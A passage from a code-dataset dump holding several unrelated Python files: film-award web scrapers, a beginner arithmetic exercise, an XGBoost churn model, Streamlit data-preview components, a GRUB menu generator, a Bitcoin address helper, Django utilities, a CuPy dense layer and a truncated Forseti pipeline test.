self._uni_nfkc(title_elm.text),\n }\n\n # XXX: has not yet been uploaded\n yield {\n 'name': self.name,\n 'year': 2018,\n 'title': '孤狼の血',\n }\n\n\nclass MainichiFilmAward(Prize):\n @property\n def url(self):\n return \"https://mainichi.jp/mfa/history/\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for li in self.soup.select(\"ul.list-history > li\"):\n line = self._uni_nfkc(li.select_one('a').text)\n\n match = re.match(r'(\\d{4})年\\(第\\d+回\\)『(.*)』', line)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': match.group(2),\n }\n\n\nclass BlueRibbonAward(Prize):\n @property\n def url(self):\n return \"https://mihocinema.com/blueribbon-list\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for tr in self.soup.select('table tr'):\n year_elm = tr.select_one('td:nth-child(2)')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3)')\n if not title_elm:\n continue\n\n year_text = self._uni_nfkc(year_elm.text)\n title_text = self._uni_nfkc(title_elm.text)\n\n match = re.match(r'(\\d{4})年', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n\n\nclass KinejunBestTen(Prize):\n @property\n def url(self):\n return \"http://www.kinenote.com/main/award/kinejun/\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for tr in self.soup.select('table.tbl_year > tr'):\n year_elm = tr.select_one('td:nth-child(1) > a')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3) > a')\n if not title_elm:\n continue\n\n year_text = self._uni_nfkc(year_elm.text)\n title_text = self._uni_nfkc(title_elm.text)\n\n match = re.match(r'(\\d{4})年', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n","repo_name":"kondounagi/japanese_movies_dataset","sub_path":"src/nay/prize.py","file_name":"prize.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71824841106","text":"# Refazendo o exe051 - Progressão Aritmédica\nimport time\nprint('='*10,'Progressão Aritmédica v2.0','='*10)\np_termo = int(input('\\nDigite o primeiro termo termo dessa PA: '))\nrazao = int(input('Digite a razão dessa PA: '))\ndecimo = p_termo\nx = 1\n\nprint(f'\\nOs dez primeiros termos dessa PA são: {p_termo}',end=' ')\n\nwhile x < 10:\n p_termo = decimo + razao\n decimo = p_termo\n x += 1\n time.sleep(0.5)\n print(decimo,end=' ')\n\nmais_termos = str(input('\\nVocê quer ver mais termos dessa PA ? [s/n] ')).lower()\n\nwhile mais_termos != 's' and mais_termos != 'n':\n mais_termos = str(input('\\nVocê quer ver mais termos dessa PA ? [s/n] ')).lower()\n\nif mais_termos == 's':\n mais_termos = int(input('\\nDigite quantos termos a mais quer ver: '))\n x = 0\n while x < mais_termos:\n p_termo = decimo + razao\n decimo = p_termo\n print(decimo,end=' ')\n time.sleep(0.5)\n x += 1\n","repo_name":"gabrielcosmo/cursoemvideo.curso.python3","sub_path":"Mundo2/exe062.py","file_name":"exe062.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20132660641","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[28]:\n\n\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[29]:\n\n\ndataframe = pd.read_csv(\"C:/Users/rishu/OneDrive/Desktop/project/Rusali/Fraudulent-Customer-Detection-in-Banks-Rishi/Churn_Modelling.csv\")\n\n\n# In[30]:\n\n\ndataframe.head()\n\n\n# In[31]:\n\n\ndataframe.columns\n\n\n# In[32]:\n\n\ndataframe.index\n\n\n# In[33]:\n\n\ndataframe.info()\n\n\n# In[34]:\n\n\nX = dataframe.iloc[:, 3:13].values\n\n\n# In[35]:\n\n\nY = dataframe.iloc[:, -1].values\n\n\n# In[36]:\n\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\n\n# In[37]:\n\n\nlabelE_X1 = LabelEncoder()\nX[:,1] = labelE_X1.fit_transform(X[:,1])\n\n\n# In[38]:\n\n\nlabelE_X2 = LabelEncoder()\nX[:,2] = labelE_X1.fit_transform(X[:,2])\n\n\n# In[39]:\n\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough')\nX = np.array(ct.fit_transform(X))\n\n\n# In[40]:\n\n\nX = X[:,1:]\n\n\n# In[41]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 40)\n\n\n# In[42]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[43]:\n\n\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.fit_transform(X_test)\n\n\n# In[44]:\n\n\nimport xgboost\n\n\n# In[45]:\n\n\nmodel = xgboost.XGBClassifier(random_state=40)\n\n\n# In[46]:\n\n\nmodel.fit(X_train,Y_train)\n\n\n# In[47]:\n\n\ny_pred = model.predict(X_test)\n\n\n# In[48]:\n\n\ny_pred\n\n\n# In[49]:\n\n\nfrom sklearn.metrics import accuracy_score\n\n\n# In[50]:\n\n\naccuracy_score(Y_test, y_pred)\n\n\n# ### Parameter Tuning for XGBoost\n\n# In[54]:\n\n\nparameters = {\n \"max_depth\": [3, 4, 5, 6, 8, 10, 12, 15],\n \"learning_rate\": [0.5, 0.10, 0.15, 0.20, 0.25, 0.30],\n \"min_child_weight\": [1, 3, 5, 7],\n \"gamma\": [0.0, 0.1, 0.2, 0.3, 0.4],\n \"colsample_bytree\": [0.3, 0.4, 0.5, 0.7]\n}\n\n\n# In[55]:\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\n\n\n# In[56]:\n\n\nrcv = RandomizedSearchCV(model, param_distributions=parameters,n_iter=5,scoring=\"roc_auc\", n_jobs=1, cv=5, verbose=3)\n\n\n# In[58]:\n\n\nrcv.fit(X_train,Y_train)\n\n\n# In[59]:\n\n\nrcv.best_params_\n\n\n# In[66]:\n\n\nmodel_new = xgboost.XGBClassifier(min_child_weight=1,max_depth=5,learning_rate=0.1,gamma=0.4,colsample_bytree=0.5)\n\n\n# In[67]:\n\n\nmodel_new.fit(X_train,Y_train)\n\n\n# In[68]:\n\n\ny_pred_new = model_new.predict(X_test)\n\n\n# In[69]:\n\n\ny_pred_new\n\n\n# In[70]:\n\n\naccuracy_score(Y_test, y_pred_new)\n\n","repo_name":"Rusali28/Fraudulent-Customer-Detection-in-Banks","sub_path":"Fraudulent-Customer-Detection-in-Banks-Rishi/Fraudulent_Customer_Detection_XGBoost.py","file_name":"Fraudulent_Customer_Detection_XGBoost.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6796030549","text":"# -*- coding: utf-8 -*-\nimport uuid\nfrom abc import abstractmethod\nfrom typing import TYPE_CHECKING, List, Mapping, Union\n\nfrom pydantic import Field\n\nfrom kiara.api import Value, ValueMap\nfrom kiara_plugin.streamlit.components import ComponentOptions, KiaraComponent\nfrom kiara_plugin.streamlit.components.models import (\n create_recursive_table_from_model_object,\n)\nfrom kiara_plugin.streamlit.utils.components import create_list_component\n\nif TYPE_CHECKING:\n from kiara_plugin.streamlit.api import KiaraStreamlitAPI\n\n\nclass PreviewOptions(ComponentOptions):\n\n show_properties: bool = Field(\n description=\"Whether to show the properties of the value.\", default=True\n )\n height: Union[int, None] = Field(\n description=\"The height of the preview.\", default=None\n )\n display_style: str = Field(\n description=\"The display style to use for this preview.\", default=\"default\"\n )\n value: Union[str, uuid.UUID, Value] = Field(description=\"The value to preview.\")\n\n\nclass PreviewComponent(KiaraComponent[PreviewOptions]):\n\n _options = PreviewOptions # type: ignore\n\n @classmethod\n @abstractmethod\n def get_data_type(cls) -> str:\n pass\n\n @classmethod\n def get_preview_name(cls) -> str:\n return \"default\"\n\n @abstractmethod\n def render_preview(self, st: \"KiaraStreamlitAPI\", options: PreviewOptions):\n pass\n\n def _render(\n self,\n st: \"KiaraStreamlitAPI\",\n options: PreviewOptions,\n ):\n\n self.render_preview(st=st, options=options)\n\n\nclass PropertiesViewOptions(ComponentOptions):\n \"\"\"Options for the properties view component.\"\"\"\n\n value: Union[str, uuid.UUID, Value] = Field(description=\"The value to preview.\")\n\n\nclass PropertiesViewComponent(KiaraComponent[PropertiesViewOptions]):\n \"\"\"Display the properties of a value.\"\"\"\n\n _component_name = \"display_value_properties\"\n _options = PropertiesViewOptions\n\n def _render(self, st: \"KiaraStreamlitAPI\", options: PropertiesViewOptions):\n\n value = self.api.get_value(value=options.value)\n\n for prop_name, prop_value in value.property_values.items():\n _prop_name = prop_name.replace(\"metadata.\", \"\")\n st.write(f\"Metadata item: **{_prop_name}**\")\n\n table_data = create_recursive_table_from_model_object(prop_value.data)\n name_col, val_col = st.columns([1, 3])\n\n for key, value in table_data.items():\n\n with name_col:\n name_col.write(key)\n\n with val_col:\n if isinstance(value, (Mapping, List)):\n val_col.json(value, expanded=False)\n else:\n val_col.write(value)\n\n\nclass DefaultPreviewComponent(PreviewComponent):\n \"\"\"The default preview component, will render a preview component dependent on the data type of the provided value.\"\"\"\n\n _component_name = \"preview\"\n _examples = [\n {\"doc\": \"Preview a table value.\", \"args\": {\"value\": \"nodes_table\"}},\n ]\n\n @classmethod\n def get_data_type(cls) -> str:\n return \"any\"\n\n def render_preview(\n self,\n st: \"KiaraStreamlitAPI\",\n options: PreviewOptions,\n ):\n\n preview_name = options.display_style\n height = options.height\n if not height:\n height = 400\n\n _value = self.api.get_value(options.value)\n if not _value.is_set:\n st.write(\"Value not set.\")\n return\n\n component = self._kiara_streamlit.get_preview_component(\n data_type=_value.data_type_name, preview_name=preview_name\n )\n if component is not None:\n component.render_func(st)(value=_value, key=options.create_key(\"preview\"))\n else:\n if isinstance(options.value, Value):\n name = str(_value.value_id)\n else:\n name = str(options.value)\n\n renderable = self.api.render_value(\n value=_value, target_format=\"string\", use_pretty_print=True\n )\n st.text_area(\n f\"Value: {name}\",\n value=renderable,\n disabled=True,\n height=height,\n key=options.create_key(\"preview\", \"default\"),\n )\n\n\nclass PreviewListOptions(ComponentOptions):\n\n data_types: Union[str, List[str], None] = Field(\n description=\"The data types to display.\", default=None\n )\n\n\nclass ValueList(KiaraComponent[PreviewListOptions]):\n\n _component_name = \"value_list\"\n _options = PreviewListOptions\n\n def _render(\n self, st: \"KiaraStreamlitAPI\", options: PreviewListOptions\n ) -> Union[str, None]:\n\n data_types = []\n if options.data_types:\n if isinstance(options.data_types, str):\n data_types.append(options.data_types)\n else:\n data_types.extend(options.data_types)\n\n values = self.api.list_aliases(data_types=data_types)\n\n _key = options.create_key(\"value_list\")\n selected_alias = create_list_component(\n st=st, key=_key, title=\"Values\", items=list(values.keys())\n )\n\n return selected_alias\n\n\nclass ValueListPreview(KiaraComponent[PreviewListOptions]):\n\n _component_name = \"value_list_preview\"\n _options = PreviewListOptions\n\n def _render(\n self,\n st: \"KiaraStreamlitAPI\",\n options: PreviewListOptions,\n ) -> Union[str, None]:\n ratio_preview: int = 3\n data_list_column, preview_column = st.columns([1, ratio_preview])\n\n _key = options.create_key(\"data_list\")\n\n comp = self.get_component(\"value_list\")\n selected_alias = comp.render_func(data_list_column)(\n key=_key, data_types=options.data_types\n )\n\n if selected_alias:\n value = self.api.get_value(selected_alias)\n component = self.kiara_streamlit.get_preview_component(value.data_type_name)\n\n if component is None:\n component = self.kiara_streamlit.get_preview_component(\"any\")\n\n pr_opts = PreviewOptions(key=options.create_key(\"preview\"), value=value)\n component.render_preview(preview_column, options=pr_opts) # type: ignore\n\n return selected_alias\n\n\nclass ValueMapPreviewOptions(ComponentOptions):\n\n add_value_types: bool = Field(\n description=\"Whether to add the type of the value to the tab titles.\",\n default=True,\n )\n add_save_option: bool = Field(\n description=\"Whether to add a save option for every value.\", default=False\n )\n value_map: Mapping[str, Union[str, uuid.UUID, Value]] = Field(\n description=\"The values to display.\"\n )\n\n\nclass ValueMapPreview(KiaraComponent[ValueMapPreviewOptions]):\n\n _component_name = \"value_map_preview\"\n _options = ValueMapPreviewOptions\n\n def _render(\n self,\n st: \"KiaraStreamlitAPI\",\n options: ValueMapPreviewOptions,\n ) -> Union[ValueMap, None]:\n\n if not options.value_map:\n st.write(\"-- no values --\")\n return None\n\n _values = self.api.assemble_value_map(options.value_map)\n\n field_names = sorted(_values.keys())\n if not options.add_value_types:\n tab_names = field_names\n else:\n tab_names = sorted(\n (f\"{x} ({_values[x].data_type_name})\" for x in _values.keys())\n )\n\n tabs = st.tabs(tab_names)\n for idx, field in enumerate(field_names):\n\n value = _values[field]\n if not value.is_set:\n tabs[idx].markdown(\"-- value not set --\")\n else:\n component = self.kiara_streamlit.get_preview_component(\n value.data_type_name\n )\n if component is None:\n component = self.kiara_streamlit.get_preview_component(\"any\")\n\n if options.add_save_option:\n center, right = tabs[idx].columns([4, 1])\n else:\n center = tabs[idx]\n right = None\n\n _key = options.create_key(\"preview\", f\"{idx}_{field}\")\n preview_opts = PreviewOptions(key=_key, value=value)\n component.render_preview(st=center, options=preview_opts) # type: ignore\n\n if options.add_save_option:\n assert right is not None\n right.write(\"Save value\")\n with right.form(\n key=options.create_key(\"save_form\", f\"{idx}_{field}\")\n ):\n _key = options.create_key(\"alias\", f\"{idx}_{field}\")\n alias = self._st.text_input(\n \"alias\",\n value=\"\",\n key=_key,\n placeholder=\"alias\",\n label_visibility=\"hidden\",\n )\n # _key = options.create_key(\"save\", f\"{idx}_{field}\")\n save = self._st.form_submit_button(\"Save\")\n\n if save and alias:\n store_result = self.api.store_value(\n value=value, alias=alias, allow_overwrite=False\n )\n if store_result.error:\n right.error(store_result.error)\n else:\n right.success(\"Value saved\")\n st.experimental_rerun()\n\n return _values\n","repo_name":"DHARPA-Project/kiara_plugin.streamlit","sub_path":"src/kiara_plugin/streamlit/components/preview/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13354834345","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# taken from our isolinux gfxboot configuration\n# gfxboot-theme-kogaion.git/langnames.inc\nlangs = [\n [ \"en\", \"en_US\", \"English\" ],\n [ \"ro\", \"ro_RO\", \"Română\" ],\n]\n\nkeymaps = [\n [ \"af\", \"Afghanistan\"],\n [ \"al\", \"Albania\"],\n [ \"ad\", \"Andorra\"],\n [ \"ara\", \"Arabic\"],\n [ \"am\", \"Armenia\"],\n [ \"es_ast\", \"Asturian\"],\n [ \"az\", \"Azerbaijan\"],\n [ \"bd\", \"Bangladesh\"],\n [ \"by\", \"Belarus\"],\n [ \"be\", \"Belgium\"],\n [ \"bt\", \"Bhutan\"],\n [ \"ba\", \"Bosnia\"],\n [ \"br\", \"Brazil\"],\n [ \"bg\", \"Bulgaria\"],\n [ \"kh\", \"Cambodia\"],\n [ \"ca\", \"Canada\"],\n [ \"es_cat\", \"Catalan\"],\n [ \"cn\", \"China\"],\n [ \"cd\", \"Congo\"],\n [ \"hr\", \"Croatia\"],\n [ \"cz\", \"Czechia\"],\n [ \"dk\", \"Denmark\"],\n [ \"us_dvorak\", \"Dvorak\"],\n [ \"epo\", \"Esperanto\"],\n [ \"ee\", \"Estonia\"],\n [ \"et\", \"Ethiopia\"],\n [ \"fo\", \"Faroes\"],\n [ \"fi\", \"Finland\"],\n [ \"fr_oss\", \"France\"],\n [ \"ge\", \"Georgia\"],\n [ \"de\", \"Germany\"],\n [ \"gh\", \"Ghana\"],\n [ \"gr\", \"Greece\"],\n [ \"gn\", \"Guinea\"],\n [ \"in_guj\", \"Gujarati\"],\n [ \"in_guru\", \"Gurmukhi\"],\n [ \"hu\", \"Hungary\"],\n [ \"is\", \"Iceland\"],\n [ \"in\", \"India\"],\n [ \"ir\", \"Iran\"],\n [ \"iq\", \"Iraq\"],\n [ \"ie\", \"Ireland\"],\n [ \"il\", \"Israel\"],\n [ \"it\", \"Italy\"],\n [ \"jp\", \"Japan\"],\n [ \"in_kan\", \"Kannada\"],\n [ \"kz\", \"Kazakhstan\"],\n [ \"kr\", \"Korea\"],\n [ \"tr_ku\", \"Kurdish\"],\n [ \"kg\", \"Kyrgyzstan\"],\n [ \"la\", \"Laos\"],\n [ \"latam\", \"Latin Amer.\"],\n [ \"lv\", \"Latvia\"],\n [ \"lt\", \"Lithuania\"],\n [ \"mk\", \"Macedonia\"],\n [ \"in_mal\", \"Malayalam\"],\n [ \"mv\", \"Maldives\"],\n [ \"mt\", \"Malta\"],\n [ \"mao\", \"Maori\"],\n [ \"mn\", \"Mongolia\"],\n [ \"me\", \"Montenegro\"],\n [ \"ma\", \"Morocco\"],\n [ \"mm\", \"Myanmar\"],\n [ \"np\", \"Nepal\"],\n [ \"nl\", \"Netherlands\"],\n [ \"ng\", \"Nigeria\"],\n [ \"no\", \"Norway\"],\n [ \"pk\", \"Pakistan\"],\n [ \"pl\", \"Poland\"],\n [ \"pt\", \"Portugal\"],\n [ \"ro\", \"Romania\"],\n [ \"ru\", \"Russia\"],\n [ \"fi_smi\", \"Saami (Fin.)\"],\n [ \"no_smi\", \"Saami (Nor.)\"],\n [ \"se_smi\", \"Saami (Swe.)\"],\n [ \"sn\", \"Senegal\"],\n [ \"rs\", \"Serbia\"],\n [ \"sk\", \"Slovakia\"],\n [ \"si\", \"Slovenia\"],\n [ \"za\", \"South Africa\"],\n [ \"es\", \"Spain\"],\n [ \"lk\", \"Sri Lanka\"],\n [ \"se\", \"Sweden\"],\n [ \"ch_fr\", \"Swiss French\"],\n [ \"ch\", \"Swiss German\"],\n [ \"sy\", \"Syria\"],\n [ \"tj\", \"Tajikistan\"],\n [ \"in_tam\", \"Tamil\"],\n [ \"in_tel\", \"Telugu\"],\n [ \"th\", \"Thailand\"],\n [ \"tr\", \"Turkey (Q)\"],\n [ \"tr_f\", \"Turkey (F)\"],\n [ \"tm\", \"Turkmenistan\"],\n [ \"gb\", \"English UK\"],\n [ \"us\", \"USA\"],\n [ \"us_intl\", \"USA Intl.\"],\n [ \"ua\", \"Ukraine\"],\n [ \"uz\", \"Uzbekistan\"],\n [ \"vn\", \"Vietnam\"],\n]\n\nprint(\"\"\"\\\nsubmenu \"Language Selection\" {\n\"\"\")\n\nfor shortlang, lang, name in langs:\n print(\"\"\"\\\n menuentry \"%(name)s\" {\n echo \"Switching to: $chosen\"\n set lang=%(lang)s\n set bootlang=%(lang)s\n export bootlang\n export lang\n configfile /boot/grub/grub.cfg\n }\n\"\"\" % {'name': name, 'lang': lang,})\n\nprint(\"\"\"\\\n}\n\"\"\")\n\nprint(\"\"\"\\\nsubmenu \"Keyboard Selection\" {\n\"\"\")\n\nfor keymap, name in keymaps:\n print(\"\"\"\\\n menuentry \"%(name)s\" {\n echo \"Switching to: $chosen\"\n set bootkeymap=%(keymap)s\n export bootkeymap\n configfile /boot/grub/grub.cfg\n }\n\"\"\" % {'name': name, 'keymap': keymap,})\n\nprint(\"\"\"\\\n}\n\"\"\")\n","repo_name":"StefanCristian/kogaion-molecules","sub_path":"scripts/_generate_grub_langs.py","file_name":"_generate_grub_langs.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1763565095","text":"import ecdsa\nimport hashlib\nimport json\nimport util\nimport pycoin.tx\nimport urllib2\n\n# Lambda's for hashes\nsha256 = lambda h: hashlib.sha256(h).digest()\nripemd160 = lambda h: hashlib.new(\"ripemd160\", h).digest()\nmd5 = lambda h: hashlib.md5(h).digest()\n\n# Address class handles the actual address pairs,\n# It creates them from using standard SECP256k1\n# We should review the secp256k1 code and make sure it's right for security.\n\nclass Address():\n def __init__(self, pubkey, privkey, rawPubkey, rawPrivkey):\n self.pubkey = pubkey\n self.privkey = privkey\n self.rawPrivkey = rawPrivkey\n self.rawPubkey = rawPubkey\n\n # Creates new pair and returns address object\n @classmethod\n def new(cls):\n # Generates warner ECDSA objects\n ecdsaPrivkey = ecdsa.SigningKey.generate(curve=ecdsa.curves.SECP256k1)\n ecdsaPubkey = ecdsaPrivkey.get_verifying_key()\n\n rawPrivkey = ecdsaPrivkey.to_string()\n rawPubkey = \"\\x00\" + ripemd160(sha256(\"\\x04\" + ecdsaPubkey.to_string()))\n pubkeyChecksum = sha256(sha256(rawPubkey))[:4]\n rawPubkey += pubkeyChecksum\n\n pubkey = util.b58encode(rawPubkey)\n privkey = \"\\x80\" + rawPrivkey\n privkeyChecksum = sha256(sha256(privkey))[:4]\n privkey = util.b58encode(privkey + privkeyChecksum)\n\n return cls(pubkey, privkey, rawPubkey, rawPrivkey)\n\n # Creates pair from JSON parsed into standard python objects and returns address object\n @classmethod\n def fromObj(cls, data):\n pubkey = data[\"pubkey\"]\n privkey = data[\"privkey\"]\n rawPubkey = data[\"rawPubkey\"].decode(\"hex\")\n rawPrivkey = data[\"rawPrivkey\"].decode(\"hex\")\n\n return cls(pubkey, privkey, rawPubkey, rawPrivkey)\n\n # Returns JSON parsed into standard python objects and returns dictionary. This is for use with fromObj classmethod.\n def getJSONData(self):\n return {\"pubkey\":self.pubkey, \"privkey\":self.privkey, \"rawPrivkey\":self.rawPrivkey.encode(\"hex\"), \"rawPubkey\":self.rawPubkey.encode(\"hex\")}\n\n# This class represents an unspent transaction output.\nclass UTXO(object):\n def __init__(self, txhash, outindex, value, script):\n self.txhash = txhash\n self.outindex = outindex\n self.value = value\n self.script = script\n\n # I assume this outputs utxo object data as pycoin utxo data for use with pycoin send [verification needed]\n def get_pycoin_coin_source(self):\n le_txhash = self.txhash.decode('hex')[::-1]\n pycoin_txout = pycoin.tx.TxOut(self.value, self.script.decode('hex'))\n return (le_txhash, self.outindex, pycoin_txout)\n\n# Fetches UTXO's for specific address\nclass UTXOFetcher(object):\n def get_for_address(self, address):\n url = \"http://blockchain.info/unspent?active=%s\" % address\n try:\n jsonData = urllib2.urlopen(url).read()\n data = json.loads(jsonData)\n utxos = []\n for utxo_data in data['unspent_outputs']:\n txhash = utxo_data['tx_hash'].decode('hex')[::-1].encode('hex')\n utxo = UTXO(txhash, utxo_data['tx_output_n'], utxo_data['value'], utxo_data['script'])\n utxos.append(utxo)\n return utxos\n except urllib2.HTTPError as e:\n if e.code == 500:\n return []\n else:\n raise\n\n# [verification needed]\nclass TransactionData(object):\n def __init__(self):\n self.unspent = UTXOFetcher()\n","repo_name":"vbuterin/ngcccbase","sub_path":"meat.py","file_name":"meat.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"39610229577","text":"from django.core.cache import cache\nfrom django.core.management.base import BaseCommand\n\nfrom tacticalrmm.constants import (\n AGENT_OUTAGES_LOCK,\n ORPHANED_WIN_TASK_LOCK,\n RESOLVE_ALERTS_LOCK,\n SYNC_SCHED_TASK_LOCK,\n)\n\n\nclass Command(BaseCommand):\n help = \"Clear redis celery locks. Should only be ran while celery/beat is stopped.\"\n\n def handle(self, *args, **kwargs):\n for key in (\n AGENT_OUTAGES_LOCK,\n ORPHANED_WIN_TASK_LOCK,\n RESOLVE_ALERTS_LOCK,\n SYNC_SCHED_TASK_LOCK,\n ):\n cache.delete(key)\n","repo_name":"amidaware/tacticalrmm","sub_path":"api/tacticalrmm/core/management/commands/clear_redis_celery_locks.py","file_name":"clear_redis_celery_locks.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":2312,"dataset":"github-code","pt":"48"} +{"seq_id":"6496638927","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 2 15:49:26 2020\n\n@author: rjn\n\"\"\"\n\nimport copy\nfrom . import Layer\nimport cupy as cp\nimport numpy as np\n\nclass Dense(Layer):\n \n \"\"\"A fully-connected NN layer.\n \n Parameters:\n -----------\n n_units: int\n The number of neurons in the layer.\n input_shape: tuple\n The expected input shape of the layer. For dense layers a single digit specifying\n the number of features of the input. Must be specified if it is the first layer in\n the network.\n \"\"\"\n \n def __init__(self, n_units : int,\n input_shape: tuple =None):\n self.input_shape = input_shape\n self.n_units = n_units\n self.trainable = True\n \n def valid_layer(self):\n \n self.output_shape = self.determin_output_shape()\n \n assert self.n_units > 0 , 'hidden should be greater than 0'\n\n def initialize(self, optimizer):\n # Initialize the weights\n self.W = cp.random.normal(loc=0.0, scale = np.sqrt(2/(self.input_shape[1] + self.n_units)), \n size = ( self.input_shape[1],self.n_units))\n self.w0 = cp.random.normal(loc=0.0, scale = np.sqrt(2/self.n_units), size = (self.n_units) )\n # Weight optimizers\n self.opt = copy.copy(optimizer)\n\n def parameters(self):\n \n '''\n \n Returns parameters\n \n '''\n return np.prod(self.W.shape) + np.prod(self.w0.shape)\n \n def set_weights(self, weight):\n self.W = weight[0]\n self.w0 = weight[1]\n \n def load_parameters(self):\n \n para = {'W' : self.W,\n 'b': self.w0}\n return para\n\n def forward_pass(self, X : cp.array, training : str ):\n '''\n \n Parameters\n ----------\n X : cp.array\n array of prevoius data.\n training : str\n trainable.\n\n Returns\n -------\n cp.array\n output array of dense.\n \n '''\n\n if training :\n self.layer_input = X.copy()\n \n return cp.dot(X, self.W) + self.w0\n\n def backward_pass(self, accum_grad : cp.array ):\n '''\n \n Parameters\n ----------\n accum_grad : cp.array\n gradient with respect to weight.\n\n Returns\n -------\n cp.array\n gradient of activation.\n \n '''\n \n # Save weights used during forwards pass\n W = self.W\n\n if self.trainable:\n n = self.layer_input.shape[0]\n # Calculate gradient w.r.t layer weights\n \n grad_w = cp.dot(cp.asarray(self.layer_input).T, accum_grad) / n \n grad_w0 = cp.sum(accum_grad, axis=0, keepdims=True) / n\n \n cp.cuda.Stream.null.synchronize()\n \n assert grad_w.shape == self.W.shape and grad_w0.shape == self.w0.shape\n \n # Update the layer weights , )\n self.W , self.w0 =self.W_opt.update(w=self.W, b= self.w0 , \n grad_wrt_w= grad_w, grad_wrt_b =grad_w0)\n cp.cuda.Stream.null.synchronize()\n \n assert self.W.shape == W.shape\n # Return accumulated gradient for next layer\n # Calculated based on the weights used during the forward pass\n\n del self.layer_input , grad_w, grad_w0\n\n return accum_grad.dot(W.T)\n\n def determin_output_shape(self):\n \n '''\n Return input shape of this object layers\n '''\n return ( None , self.n_units)\n","repo_name":"rjnp2/deep_learning_from_scratch","sub_path":"Layers/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25287031367","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"upload-file/\", views.UserUploadedFilesView,\n name=\"UserUploadedFilesView\"),\n # path(\"get-file/\", views.GetUserUploadedFileView, name=\"GetUserUploadedFileView\"),\n path(\"summarise-text/\", views.GetSummarisedTextView,\n name=\"GetSummarisedTextView\"),\n path('register/', views.registerView, name='RegisterView'),\n path('login/', views.loginView, name='LoginView'),\n # path('logout/', views.logoutView, name = 'LogoutView'),\n path(\"process-image-url/\", views.ProcessImageURLView,\n name=\"ProcessImageURLView\"),\n path(\"history/\", views.GetUserSummaryHistory, name=\"GetUserSummaryHistory\")\n]\n","repo_name":"CSUCI-Adv-SE/Summi","sub_path":"summIApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16718281221","text":"import unittest\nimport mock\nimport ratelimiter\n\nfrom tests.inventory.pipelines.test_data import fake_configs\nfrom tests.inventory.pipelines.test_data import fake_iam_policies\nfrom tests.unittest_utils import ForsetiTestCase\nfrom google.cloud.security.common.data_access import errors as data_access_errors\nfrom google.cloud.security.common.data_access import project_dao as proj_dao\nfrom google.cloud.security.common.gcp_api import cloud_resource_manager as crm\nfrom google.cloud.security.common.gcp_api import errors as api_errors\nfrom google.cloud.security.common.util import log_util\nfrom google.cloud.security.inventory import errors as inventory_errors\nfrom google.cloud.security.inventory.pipelines import load_projects_iam_policies_pipeline\n\n\nclass LoadProjectsIamPoliciesPipelineTest(ForsetiTestCase):\n \"\"\"Tests for the load_org_iam_policies_pipeline.\"\"\"\n\n FAKE_PROJECT_NUMBERS = ['11111', '22222']\n\n def setUp(self):\n \"\"\"Set up.\"\"\"\n self.cycle_timestamp = '20001225T120000Z'\n self.configs = fake_configs.FAKE_CONFIGS\n self.mock_crm = mock.create_autospec(crm.CloudResourceManagerClient)\n self.mock_dao = mock.create_autospec(proj_dao.ProjectDao)\n self.pipeline = (\n load_projects_iam_policies_pipeline.LoadProjectsIamPoliciesPipeline(\n self.cycle_timestamp,\n self.configs,\n self.mock_crm,\n self.mock_dao))\n\n def test_can_transform_project_iam_policies(self):\n \"\"\"Test that project iam policies can be tranformed.\"\"\"\n\n loadable_iam_policies = list(self.pipeline._transform(\n fake_iam_policies.FAKE_PROJECT_IAM_POLICY_MAP))\n self.assertEquals(\n fake_iam_policies.EXPECTED_LOADABLE_PROJECT_IAM_POLICY,\n loadable_iam_policies)\n\n def test_api_is_called_to_retrieve_org_policies(self):\n \"\"\"Test that api is called to retrieve org policies.\"\"\"\n\n self.pipeline.dao.get_project_numbers.return_value = (\n self.FAKE_PROJECT_NUMBERS)\n self.pipeline._retrieve()\n\n 